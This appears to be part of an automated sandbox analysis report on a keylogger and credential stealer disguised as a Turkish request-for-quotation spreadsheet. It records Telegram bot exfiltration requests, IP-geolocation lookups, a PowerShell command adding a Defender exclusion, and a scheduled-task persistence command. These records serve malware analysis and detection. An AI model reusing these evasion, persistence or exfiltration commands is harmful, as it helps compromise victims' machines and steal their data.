2024-10-14 09:05:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49749	149.154.167.220	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:35 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2018:29:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-14 09:05:35 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 14 Oct 2024 09:05:35 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-14 09:05:35 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49751	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:35 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:36 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:36 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30812 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mp0GnNsiblKOdjAhBm%2BRkfucHL4cLCjhu8lB0ZI1dRyoQglHTvFJKMVkj4bsF2n0nDE5CKUGPVbes6KfZV4srcVtbCL5g1%2Bv0u%2Fyz2RIlSE9BcEKdgwAsUkZdUQclRDcf5hQVLfb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2668981cf87c7b-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:36 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49753	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:37 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:37 UTC	714	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:37 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30813 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92w7tyeivmm6pfChqDHaU2D6zT2vMIJ%2BYdI82a6s%2B%2FtLIY%2BVrOqQp%2FW6T5NgcpeoPchGMVa0uDB7V1rnxWtuMNekAuG9j4Gs3m7WFkDQJ5d%2FbJyNO7GO6ifiVOUY6%2BIM9Hi5Y7ik"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2668a0a878c341-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:37 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49754	149.154.167.220	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:38 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2019:08:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-14 09:05:38 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 14 Oct 2024 09:05:38 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-14 09:05:38 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	1
Start time:	05:05:16
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Imagebase:	0xba0000
File size:	762'880 bytes
MD5 hash:	83609DC3087AD861899A060172BA6882
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:05:18
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Imagebase:	0x210000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:05:18
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:05:18
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"
Imagebase:	0x210000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:05:19
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:05:19
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp"
Imagebase:	0x160000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:05:19
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:05:20
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Imagebase:	0x180000
File size:	762'880 bytes
MD5 hash:	83609DC3087AD861899A060172BA6882
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:05:20
Start date:	14/10/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
Imagebase:	0xbf0000
File size:	762'880 bytes
MD5 hash:	83609DC3087AD861899A060172BA6882
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2762742331.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2758777957.000000000043D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	05:05:21
Start date:	14/10/2024
Path:	C:\Users\user\AppData\Roaming\qovDEn.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\qovDEn.exe
Imagebase:	0xb50000
File size:	762'880 bytes
MD5 hash:	83609DC3087AD861899A060172BA6882
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:05:21
Start date:	14/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	05:05:23
Start date:	14/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp"
Imagebase:	0x160000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:05:23
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:05:23
Start date:	14/10/2024
Path:	C:\Users\user\AppData\Roaming\qovDEn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\qovDEn.exe"
Imagebase:	0xfc0000
File size:	762'880 bytes
MD5 hash:	83609DC3087AD861899A060172BA6882
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000002.2758770244.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2761770176.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	05:05:53
Start date:	14/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.7%
Total number of Nodes:	107
Total number of Limit Nodes:	10

Executed Functions

Function 03056C30 Relevance: 23.6, Strings: 18, Instructions: 1084
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 030577C9
t, xrefs: 0305794B
u, xrefs: 030578F8
T, xrefs: 030573F7
Y, xrefs: 03056ECC
Q, xrefs: 03056FAB
Y, xrefs: 03056FA4
Q, xrefs: 0305727F
u, xrefs: 0305776C
Y, xrefs: 0305717C
Q, xrefs: 03056ED3
*, xrefs: 03057678
u, xrefs: 03057394
>, xrefs: 03057955
%, xrefs: 03057534
Q, xrefs: 03057186
u, xrefs: 0305761B
Y, xrefs: 03057275

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: %$*$>$>$Q$Q$Q$Q$T$Y$Y$Y$Y$t$u$u$u$u
API String ID: 0-2653279799
Opcode ID: aaa4d2baca7f9a3f97f9ffbbb22f27530d089659f0e602cd7d79e4c1de688246
Instruction ID: 7a1cd0757f69aee6d37ba7eeaf5de1d4f693058befb8fd187594113a0a46b517
Opcode Fuzzy Hash: aaa4d2baca7f9a3f97f9ffbbb22f27530d089659f0e602cd7d79e4c1de688246
Instruction Fuzzy Hash: 88B22634610708CFD765EF74C854AEAB7B2BF8A301F5485A9E40A6B360DF36A985CF40

Function 03056C20 Relevance: 23.5, Strings: 18, Instructions: 990
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 030577C9
t, xrefs: 0305794B
u, xrefs: 030578F8
T, xrefs: 030573F7
Y, xrefs: 03056ECC
Q, xrefs: 03056FAB
Y, xrefs: 03056FA4
Q, xrefs: 0305727F
u, xrefs: 0305776C
Y, xrefs: 0305717C
Q, xrefs: 03056ED3
*, xrefs: 03057678
u, xrefs: 03057394
>, xrefs: 03057955
%, xrefs: 03057534
Q, xrefs: 03057186
u, xrefs: 0305761B
Y, xrefs: 03057275

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: %$*$>$>$Q$Q$Q$Q$T$Y$Y$Y$Y$t$u$u$u$u
API String ID: 0-2653279799
Opcode ID: 038e6ed45a4a875a7aa7170d64e5e6c127da71bb1c34cccccdbf9652c0aa5ec9
Instruction ID: 6dc142f1da3c4d347d621eb7121977d8d3c0237fc85027bebbe43eeb797fae37
Opcode Fuzzy Hash: 038e6ed45a4a875a7aa7170d64e5e6c127da71bb1c34cccccdbf9652c0aa5ec9
Instruction Fuzzy Hash: 28A21634600708CFD765EF74C894ADAB7B2FF8A301F5185A9E50A6B360DB36A985CF40

Function 07857B30 Relevance: 3.0, Strings: 2, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:, xrefs: 07857D88
~, xrefs: 07857D3D

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID: :$~
API String ID: 0-2431124681
Opcode ID: a2420e95b7e3826476444cb130f227cc1471bc207f901fff8a015e351bf61f34
Instruction ID: 8202c9112149e31839f7cd95678401eacb9493483d1ffca08e74d1c90f391eaf
Opcode Fuzzy Hash: a2420e95b7e3826476444cb130f227cc1471bc207f901fff8a015e351bf61f34
Instruction Fuzzy Hash: 8B32F2B5A00218DFDB15CF99C884F99BBB2FF89304F1580E9E909AB261DB319D91DF50

Function 03051344 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62b2ce3d68d665ab987afcab731859917325bfcdaa5c9680b39c7b3107496538
Instruction ID: c4284e640c4dcf5d60e24555d24f11748a25198aca4638a1e108882db708fa38
Opcode Fuzzy Hash: 62b2ce3d68d665ab987afcab731859917325bfcdaa5c9680b39c7b3107496538
Instruction Fuzzy Hash: B5A17135E0131ADFCB04DFA0D8549DEFBBAFF99310F158619E816AB2A4DB30A945CB50

Function 03051338 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca43e416a5c0092a755dd5ad759365b4f52cdbc38dfeec7e85139f0a2dbf53e
Instruction ID: 101e797dad31249aaf2b9bee11dfac9b484310a1d7cc05f106e2ba059e336527
Opcode Fuzzy Hash: 8ca43e416a5c0092a755dd5ad759365b4f52cdbc38dfeec7e85139f0a2dbf53e
Instruction Fuzzy Hash: EF917035E0131ADFCB04DFA0DC549DEFBBAFF99310B158619E816AB2A4DB30A945CB50

Function 030521D1 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1562043640.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3050000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a48ad5cf18d7e9b51150a0a95a5d3596e24c3e70c98836a94e5dc37292844a
Instruction ID: cf23fcedf2070cae3245a83cacc2bcd8316cfd5f98e2ddd4b9af2954a1944203
Opcode Fuzzy Hash: 20a48ad5cf18d7e9b51150a0a95a5d3596e24c3e70c98836a94e5dc37292844a
Instruction Fuzzy Hash: 18915135E0031ADFCB04DFA0D8949DEF7BAFF99310B158619E815AB2A4DB31A945CF50

Function 014ED6A0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 014ED71E
GetCurrentThread.KERNEL32 ref: 014ED75B
GetCurrentProcess.KERNEL32 ref: 014ED798
GetCurrentThreadId.KERNEL32 ref: 014ED7F1

Memory Dump Source

Source File: 00000001.00000002.1561277629.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6f9892c11e203f25ac8fcad7fb252d61516952d4fed2cbc94e4a3fd4419696e4
Instruction ID: 9d872252cf05639df9a960b9cb7debb6f7508b2d6ac833bb4a918159a2ee066d
Opcode Fuzzy Hash: 6f9892c11e203f25ac8fcad7fb252d61516952d4fed2cbc94e4a3fd4419696e4
Instruction Fuzzy Hash: B75147B09013498FDB14DFAAD948B9EBBF1BF88315F20845EE419A73A0DB345944CF65

Function 014EB3F9 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 014EB65E

Memory Dump Source

Source File: 00000001.00000002.1561277629.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
